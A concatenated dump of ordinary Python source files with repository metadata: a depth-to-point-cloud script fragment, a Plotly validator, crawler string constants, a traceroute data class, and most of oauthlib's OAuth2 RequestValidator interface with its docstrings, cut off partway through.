# # p=r"D:\Shai_Schneider\Apollo_dataset\val\Depth\09-00\CLEAR_SKY\DEGRADATION\With_Pedestrian\With_TrafficBarrier\Downtown\Traffic_095\0000019.png"
# # get_historgram(p, min_depth=0, max_depth=656)
# # p=r"D:\Shai_Schneider\Apollo_dataset\val\Depth\09-00\CLEAR_SKY\DEGRADATION\With_Pedestrian\With_TrafficBarrier\Downtown\Traffic_095\0000059.png"
# # get_historgram(p, min_depth=0, max_depth=656)
# plt.show()
img_path_predicted = r"D:\Shai_Schneider\pytorch-deeplab-xception\examples\example_2stage.png"
img_path_gt = r"D:\Shai_Schneider\Apollo_dataset\test\Depth\13-00\CLEAR_SKY\NO_DEGRADATION\With_Pedestrian\With_TrafficBarrier\Downtown\Traffic_117\0000000.png"
depth = np.asarray(Image.open(img_path_predicted))
depth = decode_apollo(depth)
K = [[2015.0, 0, 960.0],
[0, 2015.0, 540.0],
[0, 0, 1]]
xyz_pred = depth_to_pointcloud(depth, K, 'two_stage_points.txt')
depth = np.asarray(Image.open(img_path_gt))
depth = decode_apollo(depth)
K = [[2015.0, 0, 960.0],
[0, 2015.0, 540.0],
[0, 0, 1]]
xyz_gt = depth_to_pointcloud(depth, K, 'gt_points.txt')
    l1 = np.linalg.norm(xyz_gt - xyz_pred)  # Frobenius norm of the point-wise error
avg_line_length: 40.083333 | max_line_length: 165 | alphanum_fraction: 0.683398

hexsha: 27ed983ed5ce0cb0266666de73afcdc61d688cb9 | size: 505 | ext: py | lang: Python
repo_path: env/lib/python3.8/site-packages/plotly/validators/layout/polar/radialaxis/tickformatstop/_value.py | repo_name: acrucetta/Chicago_COVI_WebApp | repo_head_hexsha: a37c9f492a20dcd625f8647067394617988de913 | licenses: ["MIT", "Unlicense"]
max_stars_count: 76 (2020-07-06T14:44:05.000Z to 2022-02-14T15:30:21.000Z)
max_issues_count: 11 (2020-08-09T02:30:14.000Z to 2022-03-12T00:50:14.000Z)
max_forks_count: 11 (2020-07-12T16:18:07.000Z to 2022-02-05T16:48:35.000Z)
import _plotly_utils.basevalidators
class ValueValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self,
plotly_name="value",
parent_name="layout.polar.radialaxis.tickformatstop",
**kwargs
):
super(ValueValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
role=kwargs.pop("role", "style"),
**kwargs
)
avg_line_length: 28.055556 | max_line_length: 67 | alphanum_fraction: 0.615842

hexsha: 23e07c80c98a181a4aad799819c15071fb06f82b | size: 1,971 | ext: py | lang: Python
repo_path: pb_string.py | repo_name: raskitoma/crawler_bot | repo_head_hexsha: 5376904f1c92997b7284fbf44fc2e020f275ed61 | licenses: ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
#############################################
# Plazabot - pb_string.py
# (c)2021, Doubtfull Productions
#--------------------------------------------
# Common strings
#--------------------------------------------
# TODO
#--------------------------------------------
LOG_ALL = 'ALL'
LOG_ERROR = 'ERROR'
LOG_ALERT = 'ALERT'
LOG_SUCCESS = 'SUCCESS'
LOG_WARNING = 'WARNING'
LOG_CRITICAL = 'CRITICAL'
LOG_EVENT = 'EVENT'
LOG_SORT_ASC = 'asc'
LOG_SORT_DES = 'desc'
MODULE_EVENT = 'EVENT'
MODULE_BROWSER = 'BROWSER'
MODULE_COMMS = 'COMMS'
MODULE_NOTIFIER = 'NOTIFIER'
MODULE_DB = 'DB'
MODULE_MAILER = 'MAILER'
MODULE_SELENIUM = 'SELENIUM'
MODULE_CRAWLER = 'CRAWLER'
# Other strings...
HELPER_URI = 'Project URI.'
HELPER_NAME = 'Optional Project Name. If not provided will generate one \
based on Filename/URI.'
HELPER_UPLD = 'Optional ZIP project file.'
HELPER_KYWD = 'Optional Keyword to filter search results. Empty \
will retrieve all available values.'
HELPER_AUTO_CLONE = 'This allows the Project to be automatically \
downloaded/grabbed on creation'
HELPER_AUTO_SCAN = 'This allows the Project to be scanned automatically \
on creation'
DEF_ERRR = 'Error: {}.'
DEF_CLOK = 'Project Grabbed/Downloaded!'
DEF_CLER = 'Error downloading: {} - {}.'
DEF_PKER = 'Project Key required!'
DEF_PJMI = 'Project {} does not exist!'
ERR_PROJ_N = 'Project file not provided, Project URI must be set!'
RESP_NEW_PROJECT = '"Result": "{} processed successfully", "DB_Status": {}, "File_Status": "{}", "Method": "{}"'
URI_NOT_PRJ = 'Error, Project not found, check URI'
URI_OK = 'Project Downloaded Successfully'
URI_SKIP = 'Project not downloaded by user request!'
ZIP_OK = 'Zip copied and expanded successfully!'
API_AUTH_ERROR = 'Error! Not authorized!'
HELPER_UNAM = 'URI username'
HELPER_PASS = 'URI password'
HELPER_TOKE = 'URI personal access token'
HELPER_BRANCH = 'URI branch'
UPD_OK = 'Project updated'
#############################################
# EoF
avg_line_length: 33.982759 | max_line_length: 112 | alphanum_fraction: 0.647387

hexsha: 5d1c315bcaf7205ccaecbb592f650b466f7318a8 | size: 3,057 | ext: py | lang: Python
repo_path: utils/traceroute_struct.py | repo_name: wikicensorship/tracevis | repo_head_hexsha: 63bc2df04c02b6eb489aaaa3e31c8f07ec40e57e | licenses: ["Unlicense"]
max_stars_count: 78 (2021-11-27T11:59:53.000Z to 2022-03-29T10:00:39.000Z)
max_issues_count: 18 (2021-11-28T00:48:48.000Z to 2022-03-23T23:03:39.000Z)
max_forks_count: 12 (2021-11-26T19:36:43.000Z to 2021-12-21T20:23:38.000Z)
#!/usr/bin/env python3
import json
import utils.convert_packetlist
class traceroute_data:
def __init__(
self, dst_addr: str, annotation: str, proto: str, port: int, timestamp: int,
src_addr: str = "127.0.0.2", from_ip: str = "127.0.0.1",
prb_id: int = -1, msm_id: int = -1, msm_name: str = "traceroute",
ttr: float = -1, af: int = 4, lts: int = -1, paris_id: int = -1,
size: int = -1, dst_name: str = "",
network_asn: str = "", network_name: str = "", country_code: str = "",
city: str = ''
) -> None:
self.af = af
self.dst_addr = dst_addr
self.dst_name = dst_name
self.annotation = annotation
self.endtime = -1
self.from_ip = from_ip
self.lts = lts
self.msm_id = msm_id
self.msm_name = msm_name
self.paris_id = paris_id
self.prb_id = prb_id
self.proto = proto
self.port = port
self.result = []
self.size = size
self.src_addr = src_addr
self.timestamp = timestamp
self.ttr = ttr
self.asn = network_asn
self.asname = network_name
self.cc = country_code
self.city = city
def add_hop(self, hop, from_ip, rtt, size, ttl, answer_summary, answered, unanswered):
if len(self.result) < hop:
(self.result).append({"hop": hop, "result": []})
if rtt == 0:
self.result[hop - 1]["result"].append({
"x": "-",
})
elif from_ip == "***":
packetlist = utils.convert_packetlist.packetlist2json(
answered, unanswered, self.from_ip)
self.result[hop - 1]["result"].append({
"x": "*",
"packets": packetlist,
})
else:
packetlist = utils.convert_packetlist.packetlist2json(
answered, unanswered, self.from_ip)
self.result[hop - 1]["result"].append({
"from": from_ip,
"rtt": rtt,
"size": size,
"ttl": ttl,
"summary": answer_summary,
"packets": packetlist,
})
def set_endtime(self, endtime):
self.endtime = endtime
if self.src_addr == self.from_ip:
self.src_addr = '127.1.2.7'
if self.from_ip != '127.1.2.7':
self.from_ip = '127.1.2.7'
def clean_extra_result(self):
result_index = 0
for try_step in self.result: # will be up to 255
results = try_step["result"]
repeat_steps = 0
for result in results: # will be unknown
if "x" in result.keys():
if '-' == result["x"]:
repeat_steps += 1
if repeat_steps == len(results):
del self.result[result_index:]
break
result_index += 1
def json(self):
return json.dumps(self, default=lambda o: o.__dict__,
indent=4)
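# Illustrative sketch (not part of the original module): building a minimal
# record and serializing it. All field values below are made up.
def _example_record():
    t = traceroute_data(dst_addr="10.0.0.1", annotation="", proto="ICMP",
                        port=0, timestamp=0)
    t.set_endtime(1)   # also masks the source addresses, see set_endtime above
    return t.json()    # nested JSON via __dict__ serialization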
avg_line_length: 33.966667 | max_line_length: 90 | alphanum_fraction: 0.508669

hexsha: 03225d11262b9167086fea3076a17ef00906963b | size: 36,519 | ext: py | lang: Python
repo_path: lib/oauthlib/oauth2/rfc6749/request_validator.py | repo_name: splunkenizer/splunk_as_a_service_app | repo_head_hexsha: 97c4aaf927d2171bf131126cf9b70489ac75bc5a | licenses: ["Apache-2.0"]
max_stars_count: 7 (2019-12-21T00:14:14.000Z to 2021-03-11T14:51:37.000Z)
max_issues_count: 29 (2019-10-09T11:16:21.000Z to 2020-06-23T09:32:09.000Z)
max_forks_count: 1 (2021-05-07T10:13:31.000Z to 2021-05-07T10:13:31.000Z)
# -*- coding: utf-8 -*-
"""
oauthlib.oauth2.rfc6749.request_validator
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from __future__ import absolute_import, unicode_literals
import logging
log = logging.getLogger(__name__)
class RequestValidator(object):
def client_authentication_required(self, request, *args, **kwargs):
"""Determine if client authentication is required for current request.
According to the rfc6749, client authentication is required in the following cases:
- Resource Owner Password Credentials Grant, when Client type is Confidential or when
Client was issued client credentials or whenever Client provided client
authentication, see `Section 4.3.2`_.
- Authorization Code Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication,
see `Section 4.1.3`_.
- Refresh Token Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication, see
`Section 6`_
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
- Resource Owner Password Credentials Grant
- Refresh Token Grant
.. _`Section 4.3.2`: https://tools.ietf.org/html/rfc6749#section-4.3.2
.. _`Section 4.1.3`: https://tools.ietf.org/html/rfc6749#section-4.1.3
.. _`Section 6`: https://tools.ietf.org/html/rfc6749#section-6
"""
return True
def authenticate_client(self, request, *args, **kwargs):
"""Authenticate client through means outside the OAuth 2 spec.
Means of authentication is negotiated beforehand and may for example
be `HTTP Basic Authentication Scheme`_ which utilizes the Authorization
header.
Headers may be accessed through request.headers, and parameters found in
both body and query can be obtained by direct attribute access, i.e.
request.client_id for client_id in the URL query.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
- Resource Owner Password Credentials Grant (may be disabled)
- Client Credentials Grant
- Refresh Token Grant
.. _`HTTP Basic Authentication Scheme`: https://tools.ietf.org/html/rfc1945#section-11.1
"""
raise NotImplementedError('Subclasses must implement this method.')
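    # Illustrative sketch (not part of oauthlib): a subclass backed by a
    # hypothetical Client store might implement this roughly as:
    #
    #     def authenticate_client(self, request, *args, **kwargs):
    #         client = Client.lookup(request.client_id)   # hypothetical lookup
    #         if client and client.check_secret(request.client_secret):
    #             request.client = client
    #             return True
    #         return False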
def authenticate_client_id(self, client_id, request, *args, **kwargs):
"""Ensure client_id belong to a non-confidential client.
A non-confidential client is one that is not required to authenticate
through other means, such as using HTTP Basic.
Note, while not strictly necessary it can often be very convenient
to set request.client to the client object associated with the
given client_id.
:param client_id: Unicode client identifier.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def confirm_redirect_uri(self, client_id, code, redirect_uri, client, request,
*args, **kwargs):
"""Ensure that the authorization process represented by this authorization
code began with this 'redirect_uri'.
If the client specifies a redirect_uri when obtaining code then that
redirect URI must be bound to the code and verified equal in this
method, according to RFC 6749 section 4.1.3. Do not compare against
the client's allowed redirect URIs, but against the URI used when the
code was saved.
:param client_id: Unicode client identifier.
:param code: Unicode authorization_code.
:param redirect_uri: Unicode absolute URI.
:param client: Client object set by you, see ``.authenticate_client``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant (during token request)
"""
raise NotImplementedError('Subclasses must implement this method.')
def get_default_redirect_uri(self, client_id, request, *args, **kwargs):
"""Get the default redirect URI for the client.
:param client_id: Unicode client identifier.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: The default redirect URI for the client
Method is used by:
- Authorization Code Grant
- Implicit Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def get_default_scopes(self, client_id, request, *args, **kwargs):
"""Get the default scopes for the client.
:param client_id: Unicode client identifier.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: List of default scopes
Method is used by all core grant types:
- Authorization Code Grant
- Implicit Grant
- Resource Owner Password Credentials Grant
- Client Credentials grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def get_original_scopes(self, refresh_token, request, *args, **kwargs):
"""Get the list of scopes associated with the refresh token.
:param refresh_token: Unicode refresh token.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: List of scopes.
Method is used by:
- Refresh token grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def is_within_original_scope(self, request_scopes, refresh_token, request, *args, **kwargs):
"""Check if requested scopes are within a scope of the refresh token.
When access tokens are refreshed the scope of the new token
needs to be within the scope of the original token. This is
ensured by checking that all requested scopes strings are on
the list returned by the get_original_scopes. If this check
fails, is_within_original_scope is called. The method can be
used in situations where returning all valid scopes from the
get_original_scopes is not practical.
:param request_scopes: A list of scopes that were requested by client.
:param refresh_token: Unicode refresh_token.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Refresh token grant
"""
return False
def introspect_token(self, token, token_type_hint, request, *args, **kwargs):
"""Introspect an access or refresh token.
Called once the introspect request is validated. This method should
verify the *token* and either return a dictionary with the list of
claims associated, or `None` in case the token is unknown.
Below the list of registered claims you should be interested in:
- scope : space-separated list of scopes
- client_id : client identifier
- username : human-readable identifier for the resource owner
- token_type : type of the token
- exp : integer timestamp indicating when this token will expire
- iat : integer timestamp indicating when this token was issued
- nbf : integer timestamp indicating when it can be "not-before" used
- sub : subject of the token - identifier of the resource owner
- aud : list of string identifiers representing the intended audience
- iss : string representing issuer of this token
- jti : string identifier for the token
Note that most of them are coming directly from JWT RFC. More details
can be found in `Introspect Claims`_ or `_JWT Claims`_.
The implementation can use *token_type_hint* to improve lookup
efficiency, but must fall back to other types to be compliant with the RFC.
The dict of claims is added to request.token after this method.
:param token: The token string.
:param token_type_hint: access_token or refresh_token.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
Method is used by:
- Introspect Endpoint (all grants are compatible)
.. _`Introspect Claims`: https://tools.ietf.org/html/rfc7662#section-2.2
.. _`JWT Claims`: https://tools.ietf.org/html/rfc7519#section-4
"""
raise NotImplementedError('Subclasses must implement this method.')
def invalidate_authorization_code(self, client_id, code, request, *args, **kwargs):
"""Invalidate an authorization code after use.
:param client_id: Unicode client identifier.
:param code: The authorization code grant (request.code).
:param request: OAuthlib request.
:type request: oauthlib.common.Request
Method is used by:
- Authorization Code Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def revoke_token(self, token, token_type_hint, request, *args, **kwargs):
"""Revoke an access or refresh token.
:param token: The token string.
:param token_type_hint: access_token or refresh_token.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
Method is used by:
- Revocation Endpoint
"""
raise NotImplementedError('Subclasses must implement this method.')
def rotate_refresh_token(self, request):
"""Determine whether to rotate the refresh token. Default, yes.
When access tokens are refreshed the old refresh token can be kept
or replaced with a new one (rotated). Return True to rotate and
False to keep the original.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Refresh Token Grant
"""
return True
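# An illustrative policy override (the per-client flag below is
# hypothetical; the library default is simply to return True):
#
#     def rotate_refresh_token(self, request):
#         client = getattr(request, "client", None)
#         return bool(getattr(client, "rotate_refresh_tokens", True))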
def save_authorization_code(self, client_id, code, request, *args, **kwargs):
"""Persist the authorization_code.
The code should at minimum be stored with:
- the client_id (``client_id``)
- the redirect URI used (``request.redirect_uri``)
- a resource owner / user (``request.user``)
- the authorized scopes (``request.scopes``)
- the client state, if given (``code.get('state')``)
To support PKCE, you MUST associate the code with:
- Code Challenge (``request.code_challenge``) and
- Code Challenge Method (``request.code_challenge_method``)
The ``code`` argument is actually a dictionary, containing at least a
``code`` key with the actual authorization code:
``{'code': 'sdf345jsdf0934f'}``
It may also have a ``state`` key containing a nonce for the client, if it
chose to send one. That value should be saved and used in
``.validate_code``.
It may also have a ``claims`` parameter which, when present, will be a dict
deserialized from JSON as described at
http://openid.net/specs/openid-connect-core-1_0.html#ClaimsParameter
This value should be saved in this method and used again in ``.validate_code``.
:param client_id: Unicode client identifier.
:param code: A dict of the authorization code grant and, optionally, state.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
Method is used by:
- Authorization Code Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
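# A minimal persistence sketch, assuming a hypothetical `self.db` storage
# layer (not part of oauthlib):
#
#     def save_authorization_code(self, client_id, code, request,
#                                 *args, **kwargs):
#         self.db.codes.insert(
#             code=code["code"],
#             state=code.get("state"),
#             client_id=client_id,
#             redirect_uri=request.redirect_uri,
#             scopes=request.scopes,
#             user=request.user,
#             code_challenge=getattr(request, "code_challenge", None),
#             code_challenge_method=getattr(
#                 request, "code_challenge_method", None),
#         )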
def get_authorization_code_scopes(self, client_id, code, redirect_uri, request):
""" Extracts scopes from saved authorization code.
The scopes returned by this method is used to route token requests
based on scopes passed to Authorization Code requests.
With that the token endpoint knows when to include OpenIDConnect
id_token in token response only based on authorization code scopes.
Only code param should be sufficient to retrieve grant code from
any storage you are using, `client_id` and `redirect_uri` can gave a
blank value `""` don't forget to check it before using those values
in a select query if a database is used.
:param client_id: Unicode client identifier.
:param code: Unicode authorization code grant.
:param redirect_uri: Unicode absolute URI.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:return: A list of scopes
Method is used by:
- Authorization Token Grant Dispatcher
"""
raise NotImplementedError('Subclasses must implement this method.')
def save_token(self, token, request, *args, **kwargs):
"""Persist the token with a token type specific method.
Currently, only save_bearer_token is supported.
:param token: A (Bearer) token dict.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
"""
return self.save_bearer_token(token, request, *args, **kwargs)
def save_bearer_token(self, token, request, *args, **kwargs):
"""Persist the Bearer token.
The Bearer token should at minimum be associated with:
- a client and its client_id, if available
- a resource owner / user (request.user)
- authorized scopes (request.scopes)
- an expiration time
- a refresh token, if issued
- a claims document, if present in request.claims
The Bearer token dict may hold a number of items::
{
'token_type': 'Bearer',
'access_token': 'askfjh234as9sd8',
'expires_in': 3600,
'scope': 'string of space separated authorized scopes',
'refresh_token': '23sdf876234', # if issued
'state': 'given_by_client', # if supplied by client
}
Note that while "scope" is a space-separated list of authorized scopes,
the original list is still available in request.scopes.
The token dict is passed as a reference so any changes made to the dictionary
will go back to the user. If additional information must be returned to the
client, and it is only possible to get this information after writing the token
to storage, it should be added to the token dictionary. If the token
dictionary must be modified but the changes should not go back to the user,
a copy of the dictionary must be made before making the changes.
Also note that if an Authorization Code grant request included a valid claims
parameter (for OpenID Connect) then the request.claims property will contain
the claims dict, which should be saved for later use when generating the
id_token and/or UserInfo response content.
:param token: A Bearer token dict.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: The default redirect URI for the client
Method is used by all core grant types issuing Bearer tokens:
- Authorization Code Grant
- Implicit Grant
- Resource Owner Password Credentials Grant (might not associate a client)
- Client Credentials grant
"""
raise NotImplementedError('Subclasses must implement this method.')
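# A hedged persistence sketch, again assuming a hypothetical `self.db`
# layer and a `default_redirect_uri` attribute on the client model:
#
#     def save_bearer_token(self, token, request, *args, **kwargs):
#         self.db.tokens.insert(
#             access_token=token["access_token"],
#             refresh_token=token.get("refresh_token"),
#             scopes=request.scopes,
#             user=request.user,
#             client_id=request.client.client_id,
#             expires_in=token["expires_in"],
#         )
#         return request.client.default_redirect_uri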
def get_jwt_bearer_token(self, token, token_handler, request):
"""Get JWT Bearer token or OpenID Connect ID token
If using OpenID Connect this SHOULD call `oauthlib.oauth2.RequestValidator.get_id_token`
:param token: A Bearer token dict.
:param token_handler: The token handler (BearerToken class).
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:return: The JWT Bearer token or OpenID Connect ID token (a JWS signed JWT)
Method is used by JWT Bearer and OpenID Connect tokens:
- JWTToken.create_token
"""
raise NotImplementedError('Subclasses must implement this method.')
def get_id_token(self, token, token_handler, request):
"""Get OpenID Connect ID token
In the OpenID Connect workflows when an ID Token is requested this method is called.
Subclasses should implement the construction, signing and optional encryption of the
ID Token as described in the OpenID Connect spec.
In addition to the standard OAuth2 request properties, the request may also contain
these OIDC specific properties which are useful to this method:
- nonce, if workflow is implicit or hybrid and it was provided
- claims, if provided to the original Authorization Code request
The token parameter is a dict which may contain an ``access_token`` entry, in which
case the resulting ID Token *should* include a calculated ``at_hash`` claim.
Similarly, when the request parameter has a ``code`` property defined, the ID Token
*should* include a calculated ``c_hash`` claim.
http://openid.net/specs/openid-connect-core-1_0.html (sections `3.1.3.6`_, `3.2.2.10`_, `3.3.2.11`_)
.. _`3.1.3.6`: http://openid.net/specs/openid-connect-core-1_0.html#CodeIDToken
.. _`3.2.2.10`: http://openid.net/specs/openid-connect-core-1_0.html#ImplicitIDToken
.. _`3.3.2.11`: http://openid.net/specs/openid-connect-core-1_0.html#HybridIDToken
:param token: A Bearer token dict.
:param token_handler: The token handler (BearerToken class)
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:return: The ID Token (a JWS signed JWT)
"""
# the request.scope should be used by the get_id_token() method to determine which claims to include in the resulting id_token
raise NotImplementedError('Subclasses must implement this method.')
def validate_jwt_bearer_token(self, token, scopes, request):
"""Ensure the JWT Bearer token or OpenID Connect ID token are valids and authorized access to scopes.
If using OpenID Connect this SHOULD call `oauthlib.oauth2.RequestValidator.get_id_token`
If not using OpenID Connect this can `return None` to avoid 5xx rather 401/3 response.
OpenID connect core 1.0 describe how to validate an id_token:
- http://openid.net/specs/openid-connect-core-1_0.html#IDTokenValidation
- http://openid.net/specs/openid-connect-core-1_0.html#ImplicitIDTValidation
- http://openid.net/specs/openid-connect-core-1_0.html#HybridIDTValidation
- http://openid.net/specs/openid-connect-core-1_0.html#HybridIDTValidation2
:param token: Unicode Bearer token.
:param scopes: List of scopes (defined by you).
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is indirectly used by all core OpenID Connect JWT token issuing grant types:
- Authorization Code Grant
- Implicit Grant
- Hybrid Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_id_token(self, token, scopes, request):
"""Ensure the id token is valid and authorized access to scopes.
OpenID Connect core 1.0 describes how to validate an id_token:
- http://openid.net/specs/openid-connect-core-1_0.html#IDTokenValidation
- http://openid.net/specs/openid-connect-core-1_0.html#ImplicitIDTValidation
- http://openid.net/specs/openid-connect-core-1_0.html#HybridIDTValidation
- http://openid.net/specs/openid-connect-core-1_0.html#HybridIDTValidation2
:param token: Unicode Bearer token.
:param scopes: List of scopes (defined by you).
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is indirectly used by all core OpenID Connect JWT token issuing grant types:
- Authorization Code Grant
- Implicit Grant
- Hybrid Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_bearer_token(self, token, scopes, request):
"""Ensure the Bearer token is valid and authorized access to scopes.
:param token: A string of random characters.
:param scopes: A list of scopes associated with the protected resource.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
A key to OAuth 2 security, and to restricting the impact of leaked tokens,
is the short expiration time of tokens: *always ensure the token has not
expired!*
Two different approaches to scope validation:
1) all(scopes). The token must be authorized access to all scopes
associated with the resource. For example, the
token has access to ``read-only`` and ``images``,
thus the client can view images but not upload new ones.
Allows for fine-grained access control through
combining various scopes.
2) any(scopes). The token must be authorized access to one of the
scopes associated with the resource. For example,
token has access to ``read-only-images``.
Allows for fine-grained, although arguably less
convenient, access control.
A powerful way to use scopes would mimic UNIX ACLs and see a scope
as a group with certain privileges. For a RESTful API these might
map to HTTP verbs instead of read, write and execute.
Note, the request.user attribute can be set to the resource owner
associated with this token. Similarly the request.client and
request.scopes attribute can be set to associated client object
and authorized scopes. If you then use a decorator such as the
one provided for Django, these attributes will be made available
in all protected views as keyword arguments.
:param token: Unicode Bearer token
:param scopes: List of scopes (defined by you)
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is indirectly used by all core Bearer token issuing grant types:
- Authorization Code Grant
- Implicit Grant
- Resource Owner Password Credentials Grant
- Client Credentials Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
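# A sketch of approach 1) above (all(scopes)), with a hypothetical
# `self.db` lookup; note the expiry check and the request attributes set:
#
#     def validate_bearer_token(self, token, scopes, request):
#         stored = self.db.tokens.find(access_token=token)
#         if stored is None or stored.expired:
#             return False
#         if not all(s in stored.scopes for s in scopes):
#             return False
#         request.user = stored.user
#         request.client = stored.client
#         request.scopes = stored.scopes
#         return True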
def validate_client_id(self, client_id, request, *args, **kwargs):
"""Ensure client_id belong to a valid and active client.
Note, while not strictly necessary it can often be very convenient
to set request.client to the client object associated with the
given client_id.
:param client_id: Unicode client identifier.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
- Implicit Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
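# A sketch (hypothetical `self.db`); note the convenience of setting
# request.client, as suggested above:
#
#     def validate_client_id(self, client_id, request, *args, **kwargs):
#         client = self.db.clients.find(client_id)
#         if client is None or not client.active:
#             return False
#         request.client = client
#         return True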
def validate_code(self, client_id, code, client, request, *args, **kwargs):
"""Verify that the authorization_code is valid and assigned to the given
client.
Before returning True, set the following based on the information stored
with the code in 'save_authorization_code':
- request.user
- request.state (if given)
- request.scopes
- request.claims (if given)
OBS! The request.user attribute should be set to the resource owner
associated with this authorization code. Similarly request.scopes
must also be set.
The request.claims property, if it was given, should be assigned a dict.
If PKCE is enabled (see 'is_pkce_required' and 'save_authorization_code')
you MUST set the following based on the information stored:
- request.code_challenge
- request.code_challenge_method
:param client_id: Unicode client identifier.
:param code: Unicode authorization code.
:param client: Client object set by you, see ``.authenticate_client``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
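# A sketch restoring the request attributes saved by save_authorization_code
# (hypothetical `self.db`):
#
#     def validate_code(self, client_id, code, client, request,
#                       *args, **kwargs):
#         grant = self.db.codes.find(code=code, client_id=client_id)
#         if grant is None or grant.expired:
#             return False
#         request.user = grant.user
#         request.scopes = grant.scopes
#         request.code_challenge = grant.code_challenge
#         request.code_challenge_method = grant.code_challenge_method
#         return True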
def validate_grant_type(self, client_id, grant_type, client, request, *args, **kwargs):
"""Ensure client is authorized to use the grant_type requested.
:param client_id: Unicode client identifier.
:param grant_type: Unicode grant type, e.g. authorization_code, password.
:param client: Client object set by you, see ``.authenticate_client``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
- Resource Owner Password Credentials Grant
- Client Credentials Grant
- Refresh Token Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_redirect_uri(self, client_id, redirect_uri, request, *args, **kwargs):
"""Ensure client is authorized to redirect to the redirect_uri requested.
All clients should register the absolute URIs of all URIs they intend
to redirect to. The registration is outside of the scope of oauthlib.
:param client_id: Unicode client identifier.
:param redirect_uri: Unicode absolute URI.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
- Implicit Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_refresh_token(self, refresh_token, client, request, *args, **kwargs):
"""Ensure the Bearer token is valid and authorized access to scopes.
OBS! The request.user attribute should be set to the resource owner
associated with this refresh token.
:param refresh_token: Unicode refresh token.
:param client: Client object set by you, see ``.authenticate_client``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant (indirectly by issuing refresh tokens)
- Resource Owner Password Credentials Grant (also indirectly)
- Refresh Token Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_response_type(self, client_id, response_type, client, request, *args, **kwargs):
"""Ensure client is authorized to use the response_type requested.
:param client_id: Unicode client identifier.
:param response_type: Unicode response type, e.g. code, token.
:param client: Client object set by you, see ``.authenticate_client``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
- Implicit Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_scopes(self, client_id, scopes, client, request, *args, **kwargs):
"""Ensure the client is authorized access to requested scopes.
:param client_id: Unicode client identifier.
:param scopes: List of scopes (defined by you).
:param client: Client object set by you, see ``.authenticate_client``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by all core grant types:
- Authorization Code Grant
- Implicit Grant
- Resource Owner Password Credentials Grant
- Client Credentials Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_silent_authorization(self, request):
"""Ensure the logged in user has authorized silent OpenID authorization.
Silent OpenID authorization allows access tokens and id tokens to be
granted to clients without any user prompt or interaction.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- OpenIDConnectAuthCode
- OpenIDConnectImplicit
- OpenIDConnectHybrid
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_silent_login(self, request):
"""Ensure session user has authorized silent OpenID login.
If no user is logged in or has not authorized silent login, this
method should return False.
If the user is logged in but is associated with multiple accounts and
has not selected which one to link to the token, then this method should
raise an oauthlib.oauth2.AccountSelectionRequired error.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- OpenIDConnectAuthCode
- OpenIDConnectImplicit
- OpenIDConnectHybrid
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_user(self, username, password, client, request, *args, **kwargs):
"""Ensure the username and password is valid.
OBS! The validation should also set the user attribute of the request
